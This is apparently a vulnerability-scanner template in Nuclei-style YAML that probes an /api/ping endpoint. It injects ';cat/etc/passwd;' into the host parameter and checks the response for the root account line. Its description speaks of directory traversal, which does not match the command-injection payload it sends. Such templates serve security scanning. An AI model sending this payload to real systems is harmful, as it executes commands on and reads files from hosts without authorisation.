id: lfi-rce

info:
  name: Local-File-Inclusion-to-rce
  author: pelo
  severity: high
  description: |
     directory traversal via the GET /.. substring.

  tags: lfi,url-lfi-rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}/api/ping?count=5&host=;cat/etc/passwd;&port=80&source=1.1.1.1&type=icmp"
    headers:
     User-Agent: "Mozila/5.0 (x11; Linux x86_x64) AppleWebkit/537.36 (KHTML, like gecko) chrome/87.0.4280.67 Safari"
    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0"

